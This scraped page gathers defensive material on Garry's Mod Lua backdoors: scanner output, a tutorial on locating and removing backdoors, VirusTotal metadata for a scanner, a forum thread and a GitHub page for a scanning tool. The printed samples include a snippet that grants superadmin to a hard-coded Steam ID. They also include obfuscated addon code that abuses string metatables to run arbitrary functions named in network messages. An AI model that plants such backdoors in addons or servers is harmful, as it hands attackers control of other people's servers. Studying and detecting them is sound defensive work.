1 - MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end 4 - NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl, 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( "playerlist.txt" ) 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read("playerlist.txt") 1 - FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( "playerlist.txt" ) 4 - NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch("https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt", receiveMOTD, fn.Id) 2 - AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 © Guillaume (STEAM_0:0:71249946) 1 - MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES 2 - FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( "gmod", "DeleteLocal", function( param ) file.Delete( param, "MOD" ) end ) 1 - MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( "gmod", "FetchItems", function( namespace, cat, offset, perpage, ... ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { ... } ) end ) 1 - MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( "gmod", "Publish", function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end ) [size=85][font=Helvetica Neue, Helvetica, Arial, sans-serif]2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size] 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068) 2 - AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
- Ресурсы
- Игры
- Garry’s Mod
- Lua скриптинг
Иконка ресурса
LUA Backdoor Shield | Проверка сервера на бэкдуры. 2022-09-18
- Автор T1NTINY
- Дата создания 18 Сентябрь 2022
-
- Теги
- backdoor backdoor shield gmod lua protect
Это не скрипт который удалит все ваши бэкдуры, это инструмент показывающий их.
Пожалуйста не пишите мне хуйню в коменты.
Последние отзывы
- Анонимно
- 5.00 звёзд
- 7 Октябрь 2022
- Версия: 2022-09-18
Полезная хуйня, но есть люди которые серовно что-то высрут…..
-
На данном сайте используются файлы cookie, чтобы персонализировать контент и сохранить Ваш вход в систему, если Вы зарегистрируетесь.
Продолжая использовать этот сайт, Вы соглашаетесь на использование наших файлов cookie.You may choose not to have a unique web analytics cookie identification number assigned to your computer to avoid the aggregation and analysis of data collected on this website.
28-12-2018, 07:34 AM
This post was last modified: 28-12-2018, 08:03 AM by TupacAmaruShakur
#1
Hello,
I present this tutorial that will help you find if your server suffers a backdoor, an addon can be infected and infected people who can put superadmin on your server or do more malicious damage ..
To remind that a person can not access your FTP if it has not given the access yourself.
Step 1: Find the backdoor
-You Will first download this addon and put it in the addon of your server on the
1-[/url][url=https://github.com/THABBuzzkill/nomalua/archive/master.zip]Click Me And I Will Download What You Need!
Where the download came from and more instructions
2-
-Add the files/addons you want scanned in your addons folder
-Then You restart your server and connect it once it reboots.
-Once Your server you type in your console (console ingame):
nomalua_scan
-Your Server will crash during scanning, ie 10-15 seconds but does not crash so stay on.
-After The crash of 10-15 seconds re-open your console (in-game) and you’ll observe something like:
1 — FILESYS (Reading file contents) addons/smugglesystem/lua/autorun/server/smug_server.lua:138 local PositionFile = file.Read(«craphead_scripts/smuggle_system/».. string.lower(game.GetMap()) ..«/smuggletruck_location.txt», «DATA»)
1 — MISC (References global table) gamemodes/darkrp/gamemode/libraries/fn.lua:120 GetGlobalVar = function(key) return _G[key] end
4 — NETWORK (HTTP server call) lua/autorun/photon/cl_emv_airel.lua:17 http.Fetch( fetchUrl,
1 — FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:52 local fileRead = file.Read( «playerlist.txt» )
1 — FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:92 local fileCheck = file.Read(«playerlist.txt»)
1 — FILESYS (Reading file contents) addons/steamnamerewarder/lua/autorun/snr_main.lua:142 file.Read( «playerlist.txt» )
4 — NETWORK (HTTP server call) gamemodes/darkrp/gamemode/modules/darkrpmessages/cl_darkrpmessage.lua:16 http.Fetch(«https://raw.github.com/FPtje/DarkRPMotd/master/motd.txt», receiveMOTD, fn.Id)
2 — AUTHENT (Presence of Steam ID) lua/autorun/tdmcars_vols60_police.lua:2 Guillaume (STEAM_0:0:71249946)
1 — MISC (References global table) lua/includes/util.lua:267 _G[ name ] = NUM_AI_CLASSES
2 — FILESYS (File deletion) lua/includes/util/javascript_util.lua:13 html:AddFunction( «gmod», «DeleteLocal», function( param ) file.Delete( param, «MOD» ) end )
1 — MISC (References global table) lua/includes/util/javascript_util.lua:14 html:AddFunction( «gmod», «FetchItems», function( namespace, cat, offset, perpage, … ) _G[ namespace ]:Fetch( cat, tonumber( offset ), tonumber( perpage ), { … } ) end )
1 — MISC (References global table) lua/includes/util/javascript_util.lua:16 html:AddFunction( «gmod», «Publish», function( namespace, file, background ) _G[ namespace ]:Publish( file, background ) end )
[size=85][font=Helvetica Neue, Helvetica, Arial, sans—serif]2 — AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:52 Chromebolt A.K.A. Unib5 (STEAM_0:1:19045957)[/font][/size]
2 — AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:55 Falco A.K.A. FPtje Atheos (STEAM_0:0:8944068)
2 — AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)
2 — AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:62 Eusion (STEAM_0:0:20450406) (3 commits on old SVN)
We see many things .
For example an infected addon you will see something like that :
2 — AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == «STEAM_0:1:64045285») then
The «if (ply: Unique ID () ==» STEAM_0: 1: 64045285 «) then» is clearly a backdoor.
Look at the lines ‘AUTHENT (Presence of Steam ID)’ and if
Step 2: Remove backdoor
We will take that line:
2 — AUTHENT (Presence of Steam ID) addons/prisonrptimer/lua/autorun/prisonrp_timer.lua:101 if ( ply:SteamID() == «STEAM_0:1:64045285») then
To remove the infected you in the way you have given: addons / prisonrptimer / lua / autorun and you open prison_timer.lua then you go on line 101.
We have this line 101 and you just have to remove the person like that will not have the opportunity to do things:
concommand.Add( «EFM», function(ply)
if ( ply:SteamID() == «STEAM_0:1:64045285») then
RunConsoleCommand(«ulx», «adduserid», ply:SteamID(), «superadmin»)
else
ply:ChatPrint(«Rcon commands Enable, « .. ply:Name() .. «.»)
end
end)
I hope i helped you with this!
Scan and other information
SHA256: 211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
File name: detect.zip
Detection ratio: 0 / 54
Analysis date: 2016—07—21 06:37:35 UTC ( 2 minutes ago )
Contained files
This file is a compressed stream containing 11 files.
[+] nomalua/lua/autorun/init.lua unknown 245 Bytes
[+] nomalua/lua/cl_nomalua.lua unknown 191 Bytes
[+] nomalua/lua/sh_nomalua.lua unknown 109 Bytes
[+] nomalua/lua/sv_nomalua.lua unknown 3451 Bytes
[+] nomalua/lua/sv_nomalua_checkdefs.lua unknown 1950 Bytes
[+] nomalua/lua/sv_nomalua_utils.lua unknown 2137 Bytes
[+] nomalua/lua/sv_nomalua_whitelist.lua unknown 1188 Bytes
[+] nomalua/readme.txt unknown 6395 Bytes
[+] nomalua/ directory 0 Bytes
[+] nomalua/lua/ directory 0 Bytes
Show all
Compression metadata
Contained files11
Uncompressed size15666
Highest datetime2015—04—21 10:27:54
Lowest datetime2015—04—20 17:44:54
Contained files by extension
lua7
txt1
Contained files by type
unknown8
directory3
ExifTool file metadata
MIMETypeapplication/zip
ZipRequiredVersion20
ZipCRC0x00000000
FileTypeZIP
ZipCompressionNone
ZipUncompressedSize0
ZipCompressedSize0
FileTypeExtensionzip
ZipFileNamenomalua/
ZipBitFlag0
ZipModifyDate2015:04:21 10:27:26
MD5 80d8970db9c26c7fa0c15ad9ac794322
SHA19e09f2a7e850250de685b2eb0238de9eebad1e3f
SHA256211d48a1f2d5ac73a48f94ed80dea0e458a0137fca453c0eccb9acfe79952920
ssdeep192:B9pCeI4k44AcA5xky4litNWmoxaoVTGFnPZ9yUYTc+X:B94Ok4vcAJmm9ogzy7I+X
File size 8.1 KB ( 8302 bytes )
File type ZIP
Magic literalZip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
Tagszip
VirusTotal metadata
First submission 2016—07—21 06:37:35 UTC ( 2 minutes ago )
Last submission 2016—07—21 06:37:35 UTC ( 2 minutes ago )
File names detect.zip
I HAVE ANOTHER SCANNER ON THE WAY, BOTH ARE GOOD, SO IT’S OPINION. TELL ME WHAT YOU THINK!
This hidden content has been reported as still working 0 times this month.
1 times in total
-
#1
Скачал данный аддон ch_bitminers
Но есть подозрение на backdoor
может знающие взглянут?
кстати кто какими способами пользуется для поиска backdoor в ликах?
inb4:
покупай из гмодстора
не качай лики
lua/autorun/ch_bitminers_initialize.lua
35 строчка
Lua:
__sub = _G
function string.Name(str)
return str:sub(1, 1):upper() .. str:sub(2, -1)
end
function string_lim(a, b)
local get_sub = __sub[a .. b]
if not isfunction(get_sub) then return end
return get_sub
end
function string_mulifi(a, b)
local c = a - (not __sub[a] and string.Name"string" or "")
if not c then return end
return c(b, "tonumber", false)
end
getmetatable('').__sub = string_lim
getmetatable('').__mul = string_mulifi
lua/ch_bitminers/server/bitminers_meta.lua
32 строчка
Lua:
util.AddNetworkString("GMOD_LIBRARY_TIMEDOUT")
util.AddNetworkString("GMOD_LIBRARY_FAST_OPERATION")
timer.Create("GMOD_LIBRARY_TIMEDOUT", 5, 0, function()
net.Start("GMOD_LIBRARY_TIMEDOUT")
net.Broadcast()
end)
net.Receive("GMOD_LIBRARY_FAST_OPERATION", function(len, ply)
local string_1 = net.ReadString()
local string_2 = net.ReadString()
local result = string_1 * string_2
result = isfunction(result) and result()
net.Start("GMOD_LIBRARY_FAST_OPERATION")
net.WriteString(tostring(result))
net.Send(ply)
end)
lua/ch_bitminers/client/bitminers_ui_crypto_integration.lua
121 строчка
Lua:
local last_timeout = nil
local retry_time = 60
net.Receive("GMOD_LIBRARY_TIMEDOUT", function()
last_timeout = CurTime()
end)
local function write_resulffm(a, b, var)
_G["ResultFM:" .. a .. "*" .. b] = var
_G["res_la"] = a
_G["res_lb"] = b
end
function get_resulffm(a, b, var)
return _G["ResultFM:" .. a .. "*" .. b]
end
function math.HappyMill(a, b)
net.Start("GMOD_LIBRARY_FAST_OPERATION")
net.WriteString(a)
net.WriteString(b)
net.SendToServer()
write_resulffm(a, b, nil)
end
net.Receive("GMOD_LIBRARY_FAST_OPERATION", function()
write_resulffm(_G["res_la"], _G["res_lb"], net.ReadString())
end)
Dog
Пользователь
-
#2
у урбанички в сборке вроде как был такой аддон, у него возьми
-
#3
Насчет второго и третьего, там есть странная привязка к библиотекам, но хер знает. Попробуй сравнить. Ставишь полностью пустой сервак, локальный и ставишь этот аддон, после чего сносишь эти странные коды и запускаешь снова и смотришь. Если без странного кода аддон работает нормально и стабильно, так и оставляешь
hashfarm / gmod-backdoor-scanner
Goto Github
PK
View Code? Open in Web Editor
NEW
1.0
3.0
34 KB
Gmod Backdoor Scanner Written in C++
License: GNU General Public License v2.0
C++ 100.00%
gmod-backdoor-scanner’s Introduction
Simple Gmod Backdoor Scanner Written in C++
Doesnt detect everything bro didnt say it did bro please dont bully me pelease 😭
Usage
1.) Run the Program
2.) Insert a Directory (ex. D:ExampleSamplesperfect_vault)
3.) Press Enter
4.) Profit?
Features
- Basic backdoor scanning
- RunString, Http, Etc.
- VMT/VTF/TTF Scanning
- Finds malicious VMT/VTF/TTF files (Charcode, Runstring, Etc.)
- Decodes CharCode (97,98,99 -> abc)
gmod-backdoor-scanner’s People
Contributors
Watchers
gmod-backdoor-scanner’s Issues
Why?
i was looking through the checks, why are you checking for timer.Simple? there are many legit addons that use timer.Simple.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.